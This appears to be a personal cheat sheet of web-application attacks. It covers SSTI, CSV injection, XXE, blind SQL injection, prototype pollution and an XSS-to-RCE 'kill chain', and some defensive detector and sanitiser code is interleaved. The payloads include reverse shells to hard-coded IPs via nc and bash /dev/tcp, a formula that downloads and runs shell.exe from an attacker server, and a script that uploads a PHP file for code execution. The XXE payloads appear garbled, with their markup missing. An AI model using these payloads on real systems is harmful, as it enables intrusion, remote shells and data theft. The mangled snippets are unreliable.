Web Attack Notes

Web App Attack

Server-Side Template Injection

{{1+abcxx}}${1+abcxx}<%1+abcxx%>[abcxx]

{{7*7}}

${7*7}

<%= 7*7 %>

Welcome to #{process.mainModule.constructor._load(Buffer.from("Y2hpbGRfcHJvY2Vzcw==", 'base64').toString('ascii')).exec('nc -c sh 192.168.119.184 4469')}

A certificate is self-signed if the subject and issuer match.


CSV Injection

=cmd|' /C calc'!A0
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1


-2+3+cmd|'/C explorer http://www.google.com'!'A1'

And the following one, which will take data from cells C1 and C20 and send it to a server/port under your control:

=HYPERLINK("http://targetIP:targetPort?leak="&C1&C20, "Click for additional information")

(Although that one would require the user to click the link!)

=WEBSERVICE(CONCATENATE("http://127.0.0.1:8080/?leak=", A5))
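As an added example (not from these notes), a Python export filter that neutralises the formula-triggering cells listed above before they reach a spreadsheet, together with a scanner for inbound CSV files that reports cells a spreadsheet would evaluate. The trigger set follows the usual guidance (=, +, -, @, tab, CR); the function names are my own.

```python
import csv
import io

# Leading characters that make Excel/LibreOffice evaluate a cell as a
# formula (=, +, -, @) or that can break out of a quoted cell (tab, CR).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value):
    """Make one cell safe for spreadsheet import.

    A leading single quote tells spreadsheet applications to treat the cell
    as literal text, so a payload such as =cmd|' /C calc'!A0 is displayed
    instead of evaluated.
    """
    text = "" if value is None else str(value)
    if text.startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_rows(rows):
    """Serialise rows to CSV with every cell neutralised and fully quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


def find_formula_cells(csv_text):
    """Detection side: list (row, column, value) for cells in an inbound CSV
    that would be evaluated as formulas when opened in a spreadsheet."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if cell.startswith(FORMULA_TRIGGERS):
                hits.append((r, c, cell))
    return hits
```

Note that the `DDE ("cmd";...)` line above does not start with a trigger character and so passes through unchanged; it only fires when a spreadsheet is configured to evaluate such text, which is a separate client-side setting.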

XXE

 ]>

%dtd;
]>

  &wrapper;
  Tom

&attack;

&attack;poop212022-06-12truetrue

 ]>
&ent;poop212022-06-12truetrue

 ]>

13
poop
oxloQ7JK1hmHw9FF8tai1n5TolY=
true
true
&ent;

%dtd;
]>

  &wrapper;
  Tom

PullFilehttp://192.168.119.154/cmdasp.aspx
C:/inetpub/wwwroot/dotnetnuke/cmdasp.aspx

&attack;

]>

	&lastname;
	Tom

Password Tests

  • .भारत (used for websites in India)
  • .网络 (the .NET equivalent in China)
  • .קום (the .COM equivalent in Hebrew)
  • .இந்தியா (meaning ‘Tamil’ for India, which is a language spoken in parts of India)

1234 😀!@SomeLongPasswordPast64CharactersForTestingAuthenticationLength

😀 Password1!

極Password1!

भारत网络קוםஇந்தியா

😀極भारत 网络קוםஇந்தியா

64 with everything…

1234 😀!@SomeLongPasswordPaभारत网络קוםஇந்தியாstuthenticationLength2014
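Added example, not part of these notes: what the strings above probe is the gap between code-point length and UTF-8 byte length, which matters for byte-limited hashes (bcrypt stops at 72 bytes) and for Unicode normalisation. The helper reports both for a candidate password and refuses, rather than silently truncates, an over-limit value; the 72-byte limit and the NFC choice are assumptions of the example.

```python
import unicodedata

BCRYPT_INPUT_LIMIT = 72  # bytes past this point are ignored by bcrypt


def password_report(password, byte_limit=BCRYPT_INPUT_LIMIT):
    """Describe how a candidate password behaves at the encoding boundary.

    Returns the code-point length, the UTF-8 byte length, whether NFC
    normalisation changes the value (the same text can be typed in several
    forms), and whether a byte-limited hash would truncate it.
    """
    nfc = unicodedata.normalize("NFC", password)
    raw = password.encode("utf-8")
    return {
        "code_points": len(password),
        "utf8_bytes": len(raw),
        "nfc_changes_value": nfc != password,
        "truncated_at_limit": len(raw) > byte_limit,
        "dropped_bytes": max(0, len(raw) - byte_limit),
    }


def hash_input(password, byte_limit=BCRYPT_INPUT_LIMIT):
    """Prepare a password for a byte-limited hash: normalise to NFC first so
    equivalent inputs compare equal, then refuse anything over the limit
    instead of letting the hash silently drop the tail."""
    raw = unicodedata.normalize("NFC", password).encode("utf-8")
    if len(raw) > byte_limit:
        raise ValueError(f"password is {len(raw)} bytes; limit is {byte_limit}")
    return raw
```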

Insufficient Input Validation

#$%😀極भारत 网络קוםஇந்தியா^&*!();@\;':"-=_+€ƒ‡†‰ŒœžŸ•™

JavaScript Unicode Values

JavaScript Strings

The String.fromCharCode() Method

String.charCodeAt() converts a character into its Unicode value.

PostgreSQL

# Blind time-based check if current user is a superuser
select case when (select current_setting($$is_superuser$$))=$$on$$ then pg_sleep(5) end;

Prototype Pollution

console.log(process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/192.168.119.207/4469 0>&1\"').toString())

ref.constructor.constructor('return util')().exec('id > pooping');

XSS

Cross-Origin Resource Sharing Test

python3 -m http.server

curl http://127.0.0.1:8000/corsTest.html

Cross Origin Resource Sharing



SQLi Examples

GET /servlet/AMUserResourcesSyncServlet?ForMasRange=1&userId=1;create+temp+table+awae+(content+text);copy+awae+from+$$c:\awae.txt$$;select+case+when(ascii(substr((select+content+from+awae),1,1))=104)+then+pg_sleep(10)+end;--+ HTTP/1.0

GET /class/mods/_standard/social/index_public.php?q=test%27)/**/or/**/((char_length((select/**/version()))))=§15§%23

GET /class/mods/_standard/social/index_public.php?q=test%27)/**/or/**/(ascii(substring((select/**/user()),15,1)))=§53§%23 

GET /class/mods/_standard/social/index_public.php?q=test%27)/**/or/**/(ascii(substring((select/**/privilege_type/**/from/**/information_schema.user_privileges/**/where/**/grantee/**/=/**/"'root'@'localhost'"/**/order/**/by/**/privilege_type/**/limit/**/1),1,1)))=§53§%23
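Added detection example (not from these notes) that serves both the PostgreSQL time-based check above and these request lines: a scorer that URL-decodes a request line or takes a raw SQL statement, folds `/**/` comments to whitespace, and labels the blind-injection indicators the payloads rely on. The sample log lines are constructed to mirror the requests above, with Burp's § markers replaced by concrete values; the function names are my own.

```python
import re
import urllib.parse

# Indicators modelled on the blind / time-based payloads in the notes.
# Matching runs on the URL-decoded text with /*...*/ folded to spaces, so
# /**/ and + obfuscation cannot hide the keywords.
INDICATORS = [
    ("time-delay", re.compile(r"\b(?:pg_sleep|sleep|benchmark)\s*\(|\bwaitfor\s+delay\b", re.I)),
    ("conditional", re.compile(r"\bcase\s+when\b", re.I)),
    ("char-oracle", re.compile(r"\b(?:ascii|char_length|length)\s*\(", re.I)),
    ("schema-read", re.compile(r"\b(?:information_schema|current_setting|current_user|version)\b", re.I)),
    ("file-copy", re.compile(r"\bcopy\s+\w+\s+from\b", re.I)),
    ("stacked", re.compile(r";\s*(?:create|copy|select|insert|update|delete|drop)\b", re.I)),
    ("dollar-quote", re.compile(r"\$\$")),
    ("trailing-comment", re.compile(r"(?:--|#)\s*$")),
]

# Constructed sample log lines shaped like the requests in the notes.
SAMPLE_LINES = [
    r"GET /servlet/AMUserResourcesSyncServlet?ForMasRange=1&userId=1;create+temp+table+awae+(content+text);copy+awae+from+$$c:\awae.txt$$;select+case+when(ascii(substr((select+content+from+awae),1,1))=104)+then+pg_sleep(10)+end;--+ HTTP/1.0",
    r"GET /class/mods/_standard/social/index_public.php?q=test%27)/**/or/**/((char_length((select/**/version()))))=15%23 HTTP/1.1",
    r"GET /class/mods/_standard/social/index_public.php?q=hello+world HTTP/1.1",
]


def analyse_line(line):
    """Return (labels, decoded_text) for one request line or raw SQL statement."""
    m = re.match(r"^(?:GET|POST|PUT)\s+(\S+)", line)
    # Request line: decode its query string; anything else is taken as raw SQL.
    text = urllib.parse.unquote_plus(m.group(1).partition("?")[2]) if m else line
    folded = re.sub(r"/\*.*?\*/", " ", text)
    labels = [name for name, rx in INDICATORS if rx.search(folded)]
    if "/**/" in text:
        labels.append("comment-ws")
    return labels, text


def scan(lines, threshold=2):
    """Flag lines hitting at least `threshold` indicators; returns
    (index, labels, decoded_text) tuples for the analyst."""
    flagged = []
    for i, line in enumerate(lines):
        labels, text = analyse_line(line)
        if len(labels) >= threshold:
            flagged.append((i, labels, text))
    return flagged
```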

Kill Chain

Set up a quick local web server to host the malicious JavaScript file.

sudo python3 -m http.server 80

If Python version returned above is 3.X

python3 -m http.server

If Python version returned above is 2.X

python2 -m SimpleHTTPServer

Then use an XSS vulnerability on the target web app to load a JavaScript file from the attacker's box with the following contents:

// creates attachment that can then be hit on server giving reverse shell
// visit this site after victim opens email
// http://atmail/a/d/adminoffseclocal/false--test.php

function read_body(xhr) {
    var data;
    if (!xhr.responseType || xhr.responseType === "text") {
        data = xhr.responseText;
    } else if (xhr.responseType === "document") {
        data = xhr.responseXML;
    } else if (xhr.responseType === "json") {
        data = xhr.responseJSON;
    } else {
        data = xhr.response;
    }
    return data;
}

async function create_attachment() {
    var uri = "/index.php/mail/composemessage/addattachment/composeID/";
    var rceString = "\n\nHello World\n\n";
    var blobData = new Blob([rceString]);
    var fileData = new File([blobData], "test.php", {type: false});
    var formData = new FormData();
    formData.append("newAttachment", fileData, "test.php");

    // upload the attachment
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function() {
        if (xhr.readyState == XMLHttpRequest.DONE) {
            console.log(read_body(xhr));
        }
    };
    xhr.open("POST", uri, true);
    xhr.send(formData);

    // give the server time to store it, then request the uploaded file
    await new Promise(r => setTimeout(r, 2000));

    var xhr2 = new XMLHttpRequest();
    xhr2.onreadystatechange = function() {
        if (xhr2.readyState == XMLHttpRequest.DONE) {
            console.log(read_body(xhr2));
        }
    };
    uri = "/a/d/adminoffseclocal/false--test.php";
    xhr2.open("GET", uri, true);
    xhr2.send(null);
}

create_attachment();

XXE with DTD

Spin up a local webserver to host the file, wrapper.dtd, with the following contents:

Then we can use the following XXE payload:

%dtd;
]>

  &wrapper;
  Tom

This will concatenate the string that opens the CDATA section, the file contents parsed as a single full string (to minimize errors), and then the CDATA closing tag.

The result will give us the full contents of the tomcat-users.xml file. Instead of tomcat-users.xml, we could enumerate directories and list contents:
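Added example, not part of these notes, for the receiving side of the payloads in this section and the earlier XXE section: an input guard that reports which DTD constructs an untrusted document contains and refuses to parse anything carrying a DOCTYPE, which shuts off internal, external and parameter entities in one step. The hostile sample is constructed to mirror the %dtd;/&wrapper; pattern above; attacker.invalid is a placeholder host and the function names are my own.

```python
import re
import xml.etree.ElementTree as ET

# Constructs worth logging when they show up in untrusted XML. external-ref
# only looks inside declarations, so body text mentioning SYSTEM is ignored.
INDICATORS = [
    ("doctype", re.compile(r"<!DOCTYPE\b", re.I)),
    ("entity-decl", re.compile(r"<!ENTITY\b", re.I)),
    ("parameter-entity", re.compile(r"<!ENTITY\s+%|%[A-Za-z_][\w.-]*;", re.I)),
    ("external-ref", re.compile(r"<!(?:ENTITY|DOCTYPE)\b[^>]*\b(?:SYSTEM|PUBLIC)\b", re.I)),
]

# Constructed samples: a clean document and one that pulls a DTD from an
# attacker-controlled web server through a parameter entity.
CLEAN_DOC = "<user><lastname>Tom</lastname></user>"
HOSTILE_DOC = (
    '<?xml version="1.0"?>\n'
    "<!DOCTYPE user [\n"
    '  <!ENTITY % dtd SYSTEM "http://attacker.invalid/wrapper.dtd">\n'
    "  %dtd;\n"
    "]>\n"
    "<user><lastname>&wrapper;</lastname></user>"
)


class UnsafeXML(ValueError):
    """Raised when a document asks for DTD or entity processing."""


def xxe_indicators(xml_text):
    """Labels describing which DTD/entity constructs the document contains."""
    return [name for name, rx in INDICATORS if rx.search(xml_text)]


def parse_untrusted(xml_text):
    """Parse XML from an untrusted source, refusing any DOCTYPE outright.

    Rejecting the DTD as a whole is simpler and safer than trying to allow
    some entity declarations and block others; the indicator list is there
    so the rejection can be logged with a useful reason.
    """
    found = xxe_indicators(xml_text)
    if "doctype" in found:
        raise UnsafeXML("refused XML containing: " + ", ".join(found))
    return ET.fromstring(xml_text)
```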
